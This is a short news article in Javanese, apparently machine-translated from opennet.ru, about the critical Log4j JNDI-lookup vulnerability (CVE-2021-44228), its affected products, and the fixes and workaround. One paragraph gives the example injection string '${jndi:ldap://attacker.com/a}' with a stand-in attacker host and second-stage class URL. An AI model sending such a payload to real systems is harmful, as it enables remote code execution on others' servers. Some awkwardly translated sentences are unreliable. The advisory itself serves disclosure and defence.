Ing Apache Log4j, framework populer kanggo ngatur logging ing aplikasi Java, wis diidentifikasi kerentanan kritis sing ngidini kode sewenang-wenang bisa dieksekusi nalika nilai format khusus ing format "{jndi:URL}" ditulis ing log. Serangan kasebut bisa ditindakake ing aplikasi Java sing nyathet nilai sing ditampa saka sumber eksternal, umpamane, nalika nampilake nilai masalah ing pesen kesalahan.
Kacathet yen meh kabeh proyek nggunakake kerangka kayata Apache Struts, Apache Solr, Apache Druid utawa Apache Flink kena pengaruh masalah kasebut, kalebu Steam, Apple iCloud, klien lan server Minecraft. Dikarepake yen kerentanan bisa nyebabake gelombang serangan gedhe ing aplikasi perusahaan, mbaleni riwayat kerentanan kritis ing kerangka Apache Struts, sing, miturut perkiraan kasar, digunakake ing aplikasi web kanthi 65% saka Fortune. 100 perusahaan kalebu nyoba kanggo mindai jaringan kanggo sistem sing rawan.
Masalah kasebut saya tambah amarga kasunyatan manawa eksploitasi kerja wis diterbitake, nanging perbaikan kanggo cabang sing stabil durung dikompilasi. Pengenal CVE durung diwenehi. Ndandani mung kalebu ing cabang uji log4j-2.15.0-rc1. Minangka solusi kanggo mblokir kerentanan, disaranake nyetel parameter log4j2.formatMsgNoLookups dadi bener.
Masalah iki disebabake dening kasunyatan sing log4j ndhukung pangolahan topeng khusus "{}" ing baris output kanggo log, kang JNDI (Jawa Jeneng lan Antarmuka Direktori) bisa kaleksanan. Serangan kasebut mudhun kanggo ngliwati string kanthi substitusi "${jndi:ldap://attacker.com/a}", nalika diproses log4j bakal ngirim panjalukan LDAP kanggo path menyang kelas Java menyang server attacker.com. . Path sing dibalekake dening server penyerang (contone, http://second-stage.attacker.com/Exploit.class) bakal dimuat lan dieksekusi ing konteks proses saiki, sing ngidini panyerang nglakokake kode sewenang-wenang ing sistem karo hak aplikasi saiki.
Tambahan 1: Kerentanan wis diwenehi pengenal CVE-2021-44228.
Addendum 2: Cara kanggo ngliwati proteksi sing ditambahake dening release log4j-2.15.0-rc1 wis diidentifikasi. Nganyari anyar, log4j-2.15.0-rc2, wis diusulake kanthi proteksi sing luwih lengkap marang kerentanan. Kode kasebut nyoroti owah-owahan sing ana gandhengane karo ora ana mandap sing ora normal nalika nggunakake URL JNDI sing salah format.
Source: opennet.ru